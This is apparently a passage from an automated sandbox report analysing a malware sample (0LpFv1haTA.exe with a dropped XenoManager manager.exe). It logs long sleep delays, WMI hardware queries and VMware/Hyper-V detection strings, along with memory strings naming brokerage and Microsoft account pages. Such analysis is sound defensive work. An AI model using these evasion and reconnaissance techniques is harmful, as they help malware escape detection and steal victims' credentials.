                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597593
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597480
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597363
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597234
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597124
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 573647
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\manager.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow / User API: threadDelayed 4962Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow / User API: threadDelayed 4872Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow / User API: threadDelayed 2411
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWindow / User API: threadDelayed 4730
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeWindow / User API: threadDelayed 6624
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeWindow / User API: threadDelayed 3231
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe TID: 5236Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -599762s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -599649s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -599422s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -599313s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -599188s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -599078s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -598969s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -598844s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -598725s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -598625s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -598516s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -598406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -598297s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -598187s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -598078s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -597969s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -597844s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -597731s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -597625s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -597516s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -597406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -597296s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -597187s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -597076s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -596969s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -596857s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -596738s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -596624s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -596500s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -596391s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -596281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -596172s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -596062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -595953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -595844s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -595719s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -595609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852Thread sleep time: -595500s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 4668Thread sleep count: 2411 > 30
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 4668Thread sleep count: 4730 > 30
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599546s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599437s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599218s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598997s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598651s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598421s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598203s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598093s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597933s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597702s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597593s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597480s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597363s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597124s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -573647s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 8036Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 8044Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\manager.exe TID: 8092Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 8164Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 1576Thread sleep count: 6624 > 30
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 6196Thread sleep count: 3231 > 30
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 4072Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 5696Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 183684Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 344684Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\OpenSSH\ssh.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\OpenSSH\ssh.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599762Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599649Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599422Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599188Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599078Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598725Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598625Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598516Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598406Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598297Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598078Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597731Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597625Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597296Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597076Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596857Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596738Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596624Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596500Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596391Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596172Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 596062Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 595953Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 595844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 595719Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 595609Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 595500Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599765
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599656
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599546
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599437
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599328
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599218
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 599109
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598997
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598875
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598765
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598651
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598531
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598421
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598203
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 598093
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597933
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597812
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597702
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597593
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597480
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597363
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597234
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 597124
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 573647
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\manager.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeThread delayed: delay time: 922337203685477
                      Source: Amcache.hve.36.drBinary or memory string: VMware
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2439788315.000001E4481F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=@
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2104891776.0000019457E92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[o
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: 0LpFv1haTA.exe, 0000002E.00000002.3230872411.000001B2AF9D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll''g
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                      Source: Amcache.hve.36.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: 0LpFv1haTA.exe, 00000007.00000002.4565048036.0000021F0F6EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: Amcache.hve.36.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: Amcache.hve.36.drBinary or memory string: vmci.sys
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
